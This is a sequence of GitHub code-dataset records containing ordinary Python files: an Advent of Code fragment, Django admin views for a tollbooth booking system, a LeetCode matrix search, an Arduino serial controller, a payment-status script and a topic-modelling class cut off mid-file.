2)) # start on 5\n\n # part 2\n keypad[0] = [None, None, 1, None, None]\n keypad[1] = [None, 2, 3, 4, None]\n keypad[2] = [5, 6, 7, 8, 9 ]\n keypad[3] = [None, \"A\", \"B\", \"C\", None]\n keypad[4] = [None, None, \"D\", None, None]\n\n print(solve(keypad, instructions, 0, 2)) # start on 5\n","repo_name":"mkst/aoc","sub_path":"2016/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"31484427","text":"import datetime\nfrom django.contrib.auth.hashers import make_password, check_password\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect, JsonResponse, HttpResponse\nfrom django.shortcuts import render\n\nfrom AdminDashboard.models import *\nfrom Home.models import *\nfrom CustomerDashboard.models import *\n\n# Create your views here.\n\n\ndef adminIndex(request):\n datime = datetime.date.today()\n noofusers = Login.objects.filter(roleid=3, isdeleted=False).count()\n noofworkers = Login.objects.filter(roleid=2, isdeleted=False, isapproved=True).count()\n noofbooths = AddToll.objects.filter(isdeleted=False).count()\n noofbooking = Booking.objects.filter(isCanceled=False, isExpired=False).count()\n context = {\n 'datetime': datime,\n 'noofusers': noofusers,\n 'noofworkers': noofworkers,\n 'noofbooths': noofbooths,\n 'noofbooking': noofbooking,\n }\n return render(request, \"AdminDashboard/adminindex.html\", context)\n\n\ndef adminWorkersList(request):\n tolllog = TollRegisterAdditional.objects.filter(workerid__loginid__isdeleted=False, workerid__loginid__roleid=2).order_by('-pk')\n return render(request, \"AdminDashboard/adminworkerslist.html\", {'tolllog': tolllog})\n\n\ndef ApproveWorker(request, id):\n regobj = 
Registration.objects.get(pk=id)\n field_object = Registration._meta.get_field('loginid')\n field_value = field_object.value_from_object(regobj)\n log = Login.objects.get(pk=field_value)\n log.isapproved = True\n log.status = True\n log.save()\n messages.info(request, \"Approved {}\".format(log.username))\n return HttpResponseRedirect('/admindash/workerslist')\n\n\ndef RejectWorker(request, id):\n regobj = Registration.objects.get(pk=id)\n field_object = Registration._meta.get_field('loginid')\n field_value = field_object.value_from_object(regobj)\n log = Login.objects.get(pk=field_value)\n log.isapproved = False\n log.status = True\n log.save()\n messages.info(request, \"Rejected {}\".format(log.username))\n return HttpResponseRedirect('/admindash/workerslist')\n\n\ndef adminCustomerList(request):\n log = Registration.objects.select_related().filter(loginid__isdeleted=False).filter(loginid__roleid=3)\n vehdetails = VehicleReg.objects.filter(loginid__isdeleted=False, loginid__roleid=3, isdeleted=False)\n return render(request, \"AdminDashboard/admincustomer.html\", {'log':log, 'vehdetails': vehdetails})\n\n\ndef AddDistricts(request):\n if request.method == 'POST':\n districtname = request.POST.get('adddistrict')\n dist = AddDistrict()\n dist.DistrictName = districtname\n dist.isdeleted = False\n if AddDistrict.objects.filter(DistrictName=districtname).filter(isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n else:\n dist.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n return render(request, \"AdminDashboard/adminDistrictLocations.html\")\n\n\ndef AddLocation(request):\n if request.method == 'POST':\n cityname = request.POST.get('addlocation')\n districtname = request.POST.get('district')\n did = AddDistrict.objects.get(DistrictName=districtname)\n loc = AddLocations()\n loc.CityName = cityname\n loc.DistrictId = did\n loc.isdeleted = False\n if AddLocations.objects.filter(CityName=cityname).filter(isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n else:\n loc.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n return render(request, \"AdminDashboard/adminDistrictLocations.html\")\n\n\ndef EditDistrict(request, pk):\n dob = AddDistrict.objects.get(pk=pk)\n data = {\n 'Id': dob.pk,\n 'DistrictName': dob.DistrictName\n }\n return JsonResponse(data)\n\n\ndef UpdateDistrict(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n name = request.POST.get('DistrictName')\n dobj = AddDistrict.objects.get(pk=id)\n dobj.DistrictName = name\n if AddDistrict.objects.filter(DistrictName=name).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exist!\")\n return JsonResponse(message)\n else:\n dobj.save()\n message = {'message': 'Success'}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteDistrict(request, pk):\n dob = AddDistrict.objects.get(pk=pk)\n dob.isdeleted = True\n if AddLocations.objects.filter(DistrictId=pk, isdeleted=False).exists():\n distdat = AddDistrict.objects.filter(isdeleted=False)\n locdat = AddLocations.objects.select_related().filter(isdeleted=False)\n context = {\n 'nodelete': 'Can\\'t Delete, Because {} is already in 
location'.format(dob.DistrictName),\n 'distdat':distdat, 'locdata':locdat\n }\n return render(request, \"AdminDashboard/adminDistrictLocations.html\", context)\n else:\n dob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n\n\ndef EditLocation(request, pk):\n lob = AddLocations.objects.get(pk=pk)\n data = {\n 'Id': lob.pk,\n 'DistrictId': lob.DistrictId.DistrictName,\n 'CityName': lob.CityName\n }\n return JsonResponse(data)\n\n\ndef UpdateLocation(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n dname = request.POST.get('DistrictId')\n lname = request.POST.get('CityName')\n dobj = AddDistrict.objects.get(DistrictName=dname)\n lobj = AddLocations.objects.get(pk=id)\n lobj.CityName = lname\n lobj.DistrictId = dobj\n if AddLocations.objects.filter(CityName=lname).filter(DistrictId=dobj.id).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exist!\")\n return JsonResponse(message)\n else:\n lobj.save()\n message = {'message': 'Success'}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteLocation(request, pk):\n lob = AddLocations.objects.get(pk=pk)\n lob.isdeleted = True\n if AddRoute.objects.filter(SourceLoc=pk, isdeleted=False).exists() | AddRoute.objects.filter(DestinationLoc=pk, isdeleted=False).exists():\n distdat = AddDistrict.objects.filter(isdeleted=False)\n locdat = AddLocations.objects.select_related().filter(isdeleted=False)\n context = {\n 'nolocation': 'Can\\'t Delete, Because {} is already in route'.format(lob.CityName),\n 'distdat':distdat, 'locdata':locdat\n }\n return render(request, \"AdminDashboard/adminDistrictLocations.html\", context)\n else:\n lob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n\n\ndef ListDistrictsLocation(request):\n distdat = AddDistrict.objects.filter(isdeleted=False)\n locdat = AddLocations.objects.select_related().filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminDistrictLocations.html\", {'distdat':distdat, 'locdata':locdat})\n\n\ndef AddVehicleType(request):\n if request.method == \"POST\":\n vehtype = request.POST.get('vehtype')\n\n vehobj = AddVehicle()\n vehobj.VehicleType = vehtype\n vehobj.isdeleted = False\n if AddVehicle.objects.filter(VehicleType=vehtype, isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListVehicleType')\n else:\n vehobj.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListVehicleType')\n return render(request, \"AdminDashboard/adminAddVehType.html\")\n\n\ndef EditVehicleType(request, pk):\n vob = AddVehicle.objects.get(pk=pk)\n data = {\n 'Id': vob.pk,\n 'VehicleType': vob.VehicleType,\n }\n return JsonResponse(data)\n\n\ndef UpdateVehicleType(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n vname = request.POST.get('VehicleType')\n vobj = AddVehicle.objects.get(pk=id)\n vobj.VehicleType = vname\n if AddVehicle.objects.filter(VehicleType=vname).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exist!\")\n return JsonResponse(message)\n else:\n vobj.save()\n message = {'message': 'Success'}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef 
DeleteVehicleType(request, pk):\n vob = AddVehicle.objects.get(pk=pk)\n vob.isdeleted = True\n if AddPriceCharge.objects.filter(VehicleTypeID=pk, isdeleted=False).exists():\n vehicleobj = AddVehicle.objects.filter(isdeleted=False)\n context = {\n 'novehicle': 'Can\\'t Delete, Because there is an existing data for {}'.format(vob.VehicleType),\n 'vehicleobj': vehicleobj\n }\n return render(request, \"AdminDashboard/adminAddVehType.html\", context)\n else:\n vob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListVehicleType')\n\n\ndef ListVehicleType(request):\n vehicleobj = AddVehicle.objects.filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminAddVehType.html\", {'vehicleobj': vehicleobj})\n\n\ndef EditProfile(request):\n return render(request, \"AdminDashboard/adminEditProfile.html\")\n\n\ndef UpdateProfile(request):\n if request.method == \"POST\":\n username = request.POST.get('username')\n firstname = request.POST.get('firstname')\n lastname = request.POST.get('lastname')\n address = request.POST.get('address')\n email = request.POST.get('email')\n phone = request.POST.get('mobile')\n\n id = request.session['userid']\n logobj = Login.objects.get(pk=id)\n logobj.username = username\n logobj.save()\n regobj = Registration.objects.get(loginid=id)\n regobj.FirstName = firstname\n regobj.LastName = lastname\n regobj.Address = address\n regobj.Email = email\n regobj.Phone = phone\n if phone.isdigit() and len(phone) == 10 or len(phone) == 12:\n regobj.save()\n messages.success(request, \"Updated Successfully\")\n return HttpResponseRedirect('/admindash/EditProfile')\n else:\n return render(request, \"AdminDashboard/adminEditProfile.html\", {'number': 'Invalid Number'})\n return render(request, \"AdminDashboard/adminEditProfile.html\")\n\n\ndef UpdatePassword(request):\n id = request.session['userid']\n if request.method == \"POST\":\n password = request.POST.get('newpassword')\n logobj = Login.objects.get(pk=id)\n logobj.password = make_password(password, salt=None, hasher='default')\n logobj.save()\n messages.success(request, \"Password Changed Successfully\")\n return HttpResponseRedirect('/admindash/EditProfile')\n return render(request, \"AdminDashboard/adminEditProfile.html\")\n\n\ndef SetRoute(request):\n location = AddLocations.objects.filter(isdeleted=False)\n routeob = AddRoute.objects.select_related().filter(isdeleted=False)\n if request.method == \"POST\":\n routname = request.POST.get('routename')\n sourcel = request.POST.get('slocation')\n destinationl = request.POST.get('dlocation')\n routeobj = AddRoute()\n routeobj.RouteName = routname\n sloc = AddLocations.objects.get(CityName=sourcel, isdeleted=False)\n dloc = AddLocations.objects.get(CityName=destinationl, isdeleted=False)\n routeobj.SourceLoc = sloc\n routeobj.DestinationLoc = dloc\n routeobj.isdeleted = False\n if AddRoute.objects.filter(RouteName=routname).filter(isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListRoutes')\n elif sloc == dloc:\n messages.warning(request, \"Same Location is not Possible\")\n return HttpResponseRedirect('/admindash/ListRoutes')\n else:\n routeobj.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListRoutes')\n return render(request, \"AdminDashboard/adminListRoute.html\", {'location': location,'routeobj':routeob})\n\n\ndef EditRoute(request, pk):\n rob = AddRoute.objects.get(pk=pk)\n data = {\n 'Id': 
rob.pk,\n 'RouteName': rob.RouteName,\n 'SourceLoc': rob.SourceLoc.CityName,\n 'DestinationLoc': rob.DestinationLoc.CityName,\n }\n return JsonResponse(data)\n\n\ndef UpdateRoute(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n rname = request.POST.get('RouteName')\n sloc = request.POST.get('SourceLoc')\n dloc = request.POST.get('DestinationLoc')\n slocobj = AddLocations.objects.get(CityName=sloc, isdeleted=False)\n dlocobj = AddLocations.objects.get(CityName=dloc, isdeleted=False)\n robj = AddRoute.objects.get(pk=id)\n robj.RouteName = rname\n robj.SourceLoc = slocobj\n robj.DestinationLoc = dlocobj\n if AddRoute.objects.filter(RouteName=rname).filter(SourceLoc=slocobj.id).filter(DestinationLoc=dlocobj.id).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exists!\")\n return JsonResponse(message)\n elif slocobj == dlocobj:\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Same Location is not Possible\")\n return JsonResponse(message)\n else:\n robj.save()\n message = {'error': \"Updated Successfully\"}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteRoute(request, pk):\n rt = AddRoute.objects.get(pk=pk)\n rt.isdeleted = True\n if AddToll.objects.filter(RouteID=pk, isdeleted=False).exists():\n location = AddLocations.objects.filter(isdeleted=False)\n routeob = AddRoute.objects.select_related().filter(isdeleted=False)\n context = {\n 'noroute': 'Can\\'t Delete, Because there is an existing TollBooth in {}'.format(rt.RouteName),\n 'routeobj': routeob, 'location': location,\n }\n return render(request, \"AdminDashboard/adminListRoute.html\", context)\n else:\n rt.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListRoutes')\n\n\ndef ListRoutes(request):\n location = AddLocations.objects.filter(isdeleted=False)\n routeob = AddRoute.objects.select_related().filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminListRoute.html\", {'routeobj': routeob, 'location': location})\n\n\ndef AddTollBooths(request):\n tolls = AddToll.objects.select_related().filter(isdeleted=False)\n routes = AddRoute.objects.filter(isdeleted=False)\n if request.method == 'POST':\n tollname = request.POST.get('tollname')\n routename = request.POST.get('route')\n\n routeobject = AddRoute.objects.get(RouteName=routename)\n tolobject = AddToll()\n tolobject.TollName = tollname\n tolobject.RouteID = routeobject\n tolobject.isdeleted = False\n if AddToll.objects.filter(TollName=tollname, isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListToll')\n else:\n tolobject.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListToll')\n return render(request, \"AdminDashboard/adminListToll.html\", {'routes':routes, 'tolls':tolls})\n\n\ndef EditTolls(request, pk):\n tob = AddToll.objects.get(pk=pk)\n data = {\n 'Id': tob.pk,\n 'TollName': tob.TollName,\n 'RouteID': tob.RouteID.RouteName,\n }\n return JsonResponse(data)\n\n\ndef UpdateTolls(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n tname = request.POST.get('TollName')\n rloc = request.POST.get('RouteID')\n robj = AddRoute.objects.get(RouteName=rloc)\n tobj = AddToll.objects.get(pk=id)\n tobj.TollName = tname\n tobj.RouteID = robj\n if 
AddToll.objects.filter(TollName=tname).filter(RouteID=robj.id).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exists!\")\n return JsonResponse(message)\n else:\n tobj.save()\n message = {'error': \"Updated Successfully\"}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteTolls(request, pk):\n tob = AddToll.objects.get(pk=pk)\n tob.isdeleted = True\n if AddPriceCharge.objects.filter(TollID=pk, isdeleted=False).exists():\n routes = AddRoute.objects.filter(isdeleted=False)\n tolls = AddToll.objects.select_related().filter(isdeleted=False)\n context = {\n 'routes':routes, 'tolls': tolls,\n 'notoll': 'Can\\'t Delete, Because there is an existing data for the TollBooth {}'.format(tob.TollName),\n }\n return render(request, \"AdminDashboard/adminListToll.html\", context)\n else:\n tob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListToll')\n\n\ndef ListTollBooths(request):\n routes = AddRoute.objects.filter(isdeleted=False)\n tolls = AddToll.objects.select_related().filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminListToll.html\", {'routes':routes, 'tolls': tolls})\n\n\ndef SetCharges(request):\n if request.method == \"POST\":\n vehiclename = request.POST.get('vehtype')\n tollname = request.POST.get('tollnam')\n tobj = AddToll.objects.get(TollName=tollname, isdeleted=False)\n vobj = AddVehicle.objects.get(VehicleType=vehiclename, isdeleted=False)\n amount = request.POST.get('amount')\n\n ChargeObj = AddPriceCharge()\n ChargeObj.VehicleTypeID = vobj\n ChargeObj.TollID = tobj\n\n if AddPriceCharge.objects.filter(TollID=tobj.id).filter(VehicleTypeID=vobj.id).filter(isdeleted=False).exists():\n messages.warning(request, \"Already Exists!\")\n return HttpResponseRedirect('/admindash/ListCharge')\n else:\n ChargeObj.Amount = amount\n ChargeObj.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListCharge')\n\n\ndef EditCharge(request, pk):\n cob = AddPriceCharge.objects.get(pk=pk)\n data = {\n 'Id': cob.pk,\n 'VehicleTypeID': cob.VehicleTypeID.VehicleType,\n 'TollID': cob.TollID.TollName,\n 'Amount': cob.Amount\n }\n return JsonResponse(data)\n\n\ndef UpdateCharge(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n vname = request.POST.get('VehicleTypeID')\n tname = request.POST.get('TollID')\n amnt = request.POST.get('Amount')\n vobj = AddVehicle.objects.get(VehicleType=vname, isdeleted=False)\n tobj = AddToll.objects.get(TollName=tname, isdeleted=False)\n cobj = AddPriceCharge.objects.get(pk=id)\n cobj.VehicleTypeID = vobj\n cobj.TollID = tobj\n cobj.Amount = amnt\n if AddPriceCharge.objects.filter(TollID=tobj.id).filter(VehicleTypeID=vobj.id).filter(Amount=amnt).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exists!\")\n return JsonResponse(message)\n else:\n cobj.save()\n message = {'error': \"Updated Successfully\"}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteCharge(request, pk):\n cob = AddPriceCharge.objects.get(pk=pk)\n cob.isdeleted = True\n if Booking.objects.filter(AmountID=pk, isCanceled=False, isExpired=False).exists():\n stoll = AddToll.objects.filter(isdeleted=False)\n vtype = AddVehicle.objects.filter(isdeleted=False)\n charge = AddPriceCharge.objects.select_related().filter(isdeleted=False)\n 
context = {\n 'vtype':vtype, 'charge':charge, 'stoll': stoll,\n 'nocharge': 'Can\\'t Delete, Because there is an existing data for the amount Rs. {}'.format(cob.Amount),\n }\n return render(request, \"AdminDashboard/adminSetCharge.html\", context)\n else:\n cob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListCharge')\n\n\ndef ListCharges(request):\n stoll = AddToll.objects.filter(isdeleted=False)\n vtype = AddVehicle.objects.filter(isdeleted=False)\n charge = AddPriceCharge.objects.select_related().filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminSetCharge.html\", {'vtype':vtype, 'charge':charge, 'stoll': stoll})\n\n\ndef BookingHistory(request):\n return render(request, \"AdminDashboard/adminBookingHistory.html\")\n\n\n","repo_name":"iamdonmathew/tollbooth-management-system","sub_path":"AdminDashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"7792217813","text":"class Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n # Solution 1\n # This is the easiest way, beat 27.93% at 2019.3.27\n # Just iterate all of the numbers in every list[list]\n if not matrix: #If matrix is [] then it should return False\n # BTW, if it's \"if len(matrix) == 0:\" will only beat 2.68%\n # I guess it's beacuse it has to execute twice. Fst, len(matrix) Snd, compare to 0\n return False\n for i in range(len(matrix)):\n if target in matrix[i]:\n return True\n\n \n # Solution 2 and 3 are both bisection, almost the same\n if not matrix:\n return False\n row, col = len(matrix), len(matrix[0])\n low, high = 0, row * col - 1\n\n while low <= high: # when low > high, the list run out\n mid = (low + high) // 2\n # a[x] = matrix[x / m][x % m]\n mid_elem = matrix[mid // col][mid % col] # // in python3 means not decimal\n if mid_elem == target:\n return True\n elif mid_elem < target:\n low = mid + 1\n else:\n high = mid - 1\n return False # The list run out and should return a False \n\n\n # Solution 3\n # from functools import reduce (No need to explain how to import, right?)\n if not matrix:\n return False\n # reduce((lambda x, y: x * y), [1, 2, 3, 4]) == 1*2*3*4\n # It applies a rolling computation to sequential pairs of values in a list.\n new_matrix = reduce(lambda x, y: x + y, matrix) # Turn the matrix to normal list.\n low, high = 0, len(new_matrix)-1\n while low <= high:\n mid = (low + high) // 2\n if new_matrix[mid] == target:\n return True\n elif new_matrix[mid] < target:\n low = mid + 1\n else:\n high = mid - 1\n return False\n","repo_name":"HappyJoo/LeetCodegarbage","sub_path":"python3/074_Search_a_2D_Matrix.py","file_name":"074_Search_a_2D_Matrix.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5909317473","text":"import serial\nimport time\nimport study_load\nimport study_shuffle\n\narduino = serial.Serial(port='/dev/cu.usbmodem101', baudrate=9600, timeout=1)\n\ndef write_data(x):\n try:\n arduino.write(bytes(x, 'utf-8'))\n except serial.SerialException:\n time.sleep(0.1)\n \n time.sleep(0.5)\n\ndef read_data():\n try:\n arduino.flushInput()\n except Exception as e:\n time.sleep(0.1)\n data = arduino.readline().decode(\"utf-8\")\n return data\n\n# Load all YouTube Urls\nbrowser = study_load.driverSetup()\ncategories = study_load.loadUrls(browser)\nqueries = 
['anime', 'beach', 'window', 'r&b', 'white noise']\n\nbuttonTrigger = '1'\nleft = set(\"2\".split())\nup = set(\"3\".split())\nright = set(\"4\".split())\ndown = set(\"5\".split())\nsix = set(\"6\".split())\n\nwhile True:\n joyMoved = False\n buttonPressed = False\n choice = 0\n #Enable joystick\n write_data(\"j\")\n print(\"๑ ⋆˚₊⋆────ʚ Pick a category to continue ɞ────⋆˚₊⋆ ๑\")\n while not buttonPressed:\n try:\n value = read_data()\n except serial.SerialException:\n time.sleep(0.1)\n set1 = set(value.split())\n \n if set1 == left:\n choice = 1\n elif set1 == up:\n choice = 2\n elif set1 == right:\n choice = 3\n elif set1 == down:\n choice = 4\n elif set1 == six:\n choice = 5\n if choice != 0:\n # Enable button\n write_data(\"b\")\n print(queries[choice-1] + \" chosen\")\n try:\n value = read_data()\n except serial.SerialException:\n time.sleep(0.1)\n set1 = set(value.split())\n set2 = set(buttonTrigger.split())\n if set1 == set2 and choice != 0:\n # Disable button and joystick\n write_data(\"d\")\n buttonPressed = True\n write_data(\"g\")\n study_shuffle.shuffle(categories, choice)","repo_name":"soapsrc/study-shuffle","sub_path":"button/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16767411016","text":"import datetime\nimport logging\n\nfrom sqlalchemy.sql.functions import func\n\nfrom pcapi.core.bookings.api import mark_bookings_as_reimbursed_from_payment_ids\nfrom pcapi.models import db\nfrom pcapi.models.payment import Payment\nfrom pcapi.models.payment_status import PaymentStatus\nfrom pcapi.models.payment_status import TransactionStatus\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_payments_ids_under_review(min_id: int, batch_size: int, transaction_label: str) -> list[int]:\n payments_ids_query = (\n Payment.query.filter(Payment.transactionLabel == transaction_label)\n .filter(Payment.id.between(min_id, min_id + batch_size - 1))\n .join(PaymentStatus)\n .filter(PaymentStatus.status == TransactionStatus.UNDER_REVIEW)\n .group_by(Payment.id)\n .having(func.count(\"*\") > 0)\n .order_by(Payment.id)\n .with_entities(Payment.id)\n )\n\n return [payment_id for payment_id, in payments_ids_query.all()]\n\n\ndef mark_payments_as_sent(transaction_label: str, batch_size: int = 1000) -> None:\n modified_sum = 0\n min_id = db.session.query(func.min(Payment.id)).filter(Payment.transactionLabel == transaction_label).scalar()\n max_id = db.session.query(func.max(Payment.id)).filter(Payment.transactionLabel == transaction_label).scalar()\n\n if min_id is None or max_id is None:\n logger.info(\"No payments needed to be marked as sent\")\n return\n\n now = datetime.datetime.utcnow()\n for batch_start in range(min_id, max_id + 1, batch_size):\n payments_ids = get_payments_ids_under_review(batch_start, batch_size, transaction_label)\n if len(payments_ids) == 0:\n continue\n\n payment_statuses_to_add: list[PaymentStatus] = []\n for payment_id in payments_ids:\n payment_statuses_to_add.append(PaymentStatus(paymentId=payment_id, status=TransactionStatus.SENT, date=now))\n\n db.session.bulk_save_objects(payment_statuses_to_add)\n mark_bookings_as_reimbursed_from_payment_ids(payments_ids, now)\n db.session.commit()\n\n modified_sum += len(payments_ids)\n\n logger.info(\"%d payments have been marked as sent for transaction %s\", modified_sum, 
transaction_label)\n","repo_name":"pass-culture/pass-culture-api","sub_path":"api/src/pcapi/scripts/payment/mark_payments_as_sent.py","file_name":"mark_payments_as_sent.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"} +{"seq_id":"13451695493","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom dataclasses import dataclass\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n@dataclass\nclass ETACorpus():\n\n corpus:pd.DataFrame = None\n doc_content_col:str = 'doc_content'\n doc_id_col:str = 'doc_id'\n corpus_db:str = ''\n n_words:int = 5000\n max_df:float = .95\n min_df:float = 2\n stop_words:str = 'english'\n ngram_min:int = 1\n ngram_max:int = 3\n\n def __post_init__(self):\n self.corpus = self.corpus.reset_index().set_index(self.doc_id_col)\n return self\n\n def create_bow(self):\n \n print(\"Initializing Count Engine.\")\n self.count_engine = CountVectorizer(\n max_df=self.max_df, \n min_df=self.min_df,\n lowercase=True, \n max_features=self.n_words,\n stop_words=self.stop_words, \n ngram_range=(self.ngram_min, self.ngram_max))\n \n print(\"Generating Count Model.\")\n self.count_model = self.count_engine.fit_transform(self.corpus[self.doc_content_col])\n \n print(\"Initializing TFIDF Engine.\")\n self.tfidf_engine = TfidfTransformer()\n \n print(\"Generating TFIDF Model.\")\n self.tfidf_model = self.tfidf_engine.fit_transform(self.count_model)\n\n print(\"Extracting VOCABulary.\")\n self.VOCAB = pd.DataFrame(self.count_engine.get_feature_names(), \n columns=['term_str'])\n self.VOCAB.index.name = 'term_id'\n self.termlist = self.VOCAB.term_str.to_list()\n\n print(\"Creating Bag of Words table.\")\n \n A = pd.DataFrame(self.count_model.toarray()).stack()\n A = (A[A > 0]).to_frame('n')\n A.index.names = ['doc_id','term_id']\n\n B = pd.DataFrame(self.tfidf_model.toarray()).stack()\n B = (B[B > 0]).to_frame('tfidf')\n B.index.names = ['doc_id','term_id']\n \n self.BOW = pd.merge(A, B, on=['doc_id','term_id'])\n\n print(\"Applying stats to VOCAB.\")\n self.VOCAB['ngram_len'] = self.VOCAB.apply(lambda x: len(x.term_str.split()), 1)\n self.VOCAB['tfidf_sum'] = self.BOW.groupby(['term_id'])['tfidf'].sum() \n self.VOCAB['tfidf_mean'] = self.BOW.groupby(['term_id'])['tfidf'].mean() \n self.VOCAB['corpus_freq'] = self.BOW.groupby(['term_id'])['n'].sum()\n self.VOCAB['prior_prob'] = self.VOCAB['corpus_freq'] / self.VOCAB['corpus_freq'].sum()\n\n return self # For chaining\n\n def get_doc_term_matrix(self, bow_col='n'):\n dtm = self.BOW[bow_col].to_frame().unstack(fill_value=0)\n dtm.columns = dtm.columns.droplevel(0)\n return dtm\n\n def get_count_doc_term_matrix(self):\n return self.get_doc_term_matrix('n')\n\n def get_tfidf_doc_term_matrix(self):\n return self.get_doc_term_matrix('tfidf')\n\n\nfrom abc import ABC, abstractmethod\nimport scipy.cluster.hierarchy as sch\nimport prince\nfrom scipy.spatial.distance import pdist\nfrom sklearn.cluster import AgglomerativeClustering\nimport matplotlib.pyplot as plt\n\n@dataclass\nclass AbstractTopicModel(ABC):\n\n corpus:ETACorpus = None\n n_topics:int = 20\n engine:object = None\n model:object = None\n doc_topic_matrix:pd.DataFrame = None\n term_topic_matrix:pd.DataFrame = None\n topic:pd.DataFrame = None\n hca_pdist_metric:str = 'cosine'\n hca_linkage_method:str = 'ward'\n\n @abstractmethod\n def generate_model(self):\n pass\n\n def 
_create_topic_label(self, topic_id, term_topic_matrix, \n ascending=False, n_terms=7):\n topic_label = f\"{topic_id}: \" + ', '.join(term_topic_matrix[topic_id]\\\n .sort_values(ascending=ascending).head(n_terms)\\\n .index.to_list())\n return topic_label\n\n def get_term_network(self, n_pairs=1000):\n self.term_net = self.term_topic_matrix.T.corr()\\\n .stack().sort_values(ascending=False)\\\n .to_frame('corr').head(n_pairs)\n self.term_net.index.names = ['term1', 'term2']\n self.term_net = self.term_net.reset_index()\n\n self.term_net = self.term_net.loc[self.term_net.term1 != self.term_net.term2]\n self.term_net['key'] = self.term_net.apply(lambda x: '|'.join(sorted([x.term1, x.term2])), 1)\n self.term_net = self.term_net.drop_duplicates(subset='key')\n self.term_net = self.term_net.drop('key', 1)\n \n W = (self.term_topic_matrix[self.term_topic_matrix > 0]).sum(1)\n self.term_net['term_weight'] = self.term_net.apply(lambda x: W.loc[x.term1] * W.loc[x.term2], 1)\n self.term_net['weight'] = self.term_net.apply(lambda x: x['term_weight'] * x['corr'], 1)\n self.term_net = self.term_net.sort_values('weight', ascending=False)\n\n def collapse_doc_term_matrix(self, group_col, agg_func='mean'):\n df = self.corpus.corpus.merge(self.doc_topic_matrix, \n on=self.corpus.doc_id_col).groupby(group_col).agg(agg_func)\n return df\n \n def plot_hca(self, group_col='doc_label'):\n df = self.corpus.corpus.merge(self.doc_topic_matrix, on=self.corpus.doc_id_col)\\\n .groupby(group_col).mean()\n labels = df.apply(lambda x: x.name, 1).tolist()\n sims = pdist(df, metric=self.hca_pdist_metric)\n tree = sch.linkage(sims, method=self.hca_linkage_method)\n fig, axes = plt.subplots(figsize=(7, len(labels) / 2))\n dendrogram = sch.dendrogram(tree, labels=labels, orientation=\"left\")\n axes.tick_params(axis='both', which='major', labelsize=15) \n\n # Consider binding these features to the 